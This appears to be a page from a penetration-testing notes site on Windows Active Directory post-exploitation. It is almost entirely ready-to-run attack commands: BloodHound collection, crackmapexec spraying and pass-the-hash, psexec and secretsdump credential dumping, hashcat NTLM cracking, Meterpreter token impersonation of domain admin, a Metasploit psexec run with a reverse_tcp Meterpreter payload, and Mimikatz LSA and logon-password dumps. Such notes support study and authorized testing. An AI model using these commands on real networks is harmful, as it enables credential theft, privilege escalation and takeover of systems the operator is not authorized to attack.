Post Explotation

Post-exploitation refers to any actions taken after a session is opened. A session is an open shell from a successful exploit or bruteforce attack. A shell can be a standard shell or Meterpreter

// post explotation
Invoke-Bloodhound -CollectionMethod All -Domain TestDomain.local -ZipFileName results.zip

post exploitation
crackmapexec 10.0.0.0/24 -u username -d DOMAIN -p Password

use windows/smb/psexec
hashdump
crackmapexec 10.0.0.0/24 -u username -H 123abdehhf012445 --local

apt install crackmapexec
psexec.py domain/username:Password@10.0.0.1

secretsdump.py doamin/username:Password@ip

hashcat64.exe -m 1000 hashes4.txt rockyou.txt -O

Pass the Hash
crackmapexec ip/24 -u "administrator" -H hash --local
crackmapexec smb ip/24 -u "administrator" -H hash --local-auth

psexec.py "username":@192.168.1.1 -hashes LMHASH:NTHASH

Token Impersonation
Delegate - Created for logging into a machine or using RDP
Impersonate - "non-interactive" such as attaching a network drive or a domain logon script
https://www.offensive-security.com/metasploit-unleashed/fun-incognito/

metasploit
load incognito
meterpreter>list_tokens -u
impersonate_token domain\\username
shell

Domain Admin impersonation
impersonate_token DOmain\\administrator
shell
whoami
Invoke-Mimikatz -Command '"privilege::debug" "LSADump::LSA /patch" exit' -Computer Computer.Domain.local
Invoke-Mimikatz -Command '"privilege::debug" "LSADump::LSA /patch" exit' -Computer hydra.domain.local


// migrate to PID 1000 (should you be in a 32 bit process but require 64 bit as in the case of winlogon)
migrate 1000


apt-get install bloodhound
neo4j console &
http://localhost:7474
upload sharphound.exe
execute -f sharphound.exe
download SOMETHING.zip
bloodhound

background session [y]
session -l
use auxilary/scanner/port/tcp
set port 445
set rhosts
set threads 20
run
use exploit windows/smb/psexec
set rhosts 
set SMbuser Administrator
set SMBpass hash
set payload windows/meterpreter/reverse_tcp
set LHOST 
set lport 4445
getuid
upload /usr/share/mimikatz/x64/mimikatz.exe
shell
mimikatz
privilege::debug
sekurlsa::logonPasswords full
PreviousBloodhoundNextActive Directory

Last updated

Was this helpful?